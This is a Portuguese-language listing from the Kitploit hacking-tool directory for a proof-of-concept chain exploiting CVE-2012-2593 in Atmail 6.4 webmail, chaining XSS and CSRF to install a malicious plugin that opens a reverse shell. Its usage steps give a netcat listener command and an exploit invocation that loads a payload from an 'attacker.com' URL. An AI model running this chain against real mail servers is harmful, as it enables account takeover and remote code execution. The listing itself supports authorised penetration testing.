Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2012-2593 — Atmail XSS-CSRF-RCE Cadeia de Exploração | Kitploit
Ferramentas/GitHubGitHub/andrewtrube/cve-2012-2593
Frameworks de ExploraçãoGeração de PayloadsExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Atmail XSS-CSRF-RCE Cadeia de Exploração

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Atmail XSS-CSRF-RCE Cadeia de Exploração PoC

atmail-rce.py: Explora CVE-2012-2593 na interface webmail do Atmail.

atmail-csrf.js: Arquivo Javascript que aproveita CVE 2012-2593 em um CSRF para instalar um plugin malicioso que executa um shell reverso

Plugin.php: Plugin do Atmail a ser instalado que chama um shell reverso

!!Use apenas contra servidores nos quais você tem permissão para testar

Resumo

O servidor de email Atmail versão 6.4 possui uma vulnerabilidade XSS tanto no cabeçalho de email Date quanto no Corpo do Email (via injeção de iFrame). Isso é aproveitado em um CSRF usando a API XHR do JavaScript para enviar uma requisição com o cookie do usuário admin para o painel de administração, instalando um Plugin malicioso que executa código para um shell reverso.

Prova de Conceito

  1. Inicie um listener netcat nc -lvp 4444
  2. Abra Plugin.php e altere o endereço IP e a Porta para os do seu listener netcat
  3. Comprima Plugin com gzip e codifique em base64 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. Copie e cole a saída acima na variável data do atmail-csrf.js
  5. Execute o script atmail-rce.py python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. Aguarde até que o usuário admin faça login no email dele

Advertências

  • Funciona apenas se o alvo do XSS for um usuário admin do Atmail
  • Funciona apenas se o alvo estiver logado tanto na interface webmail quanto na interface de administração do servidor
  • Funciona apenas se a instalação de plugins estiver permitida no servidor (ativado por padrão)
Baixar ferramenta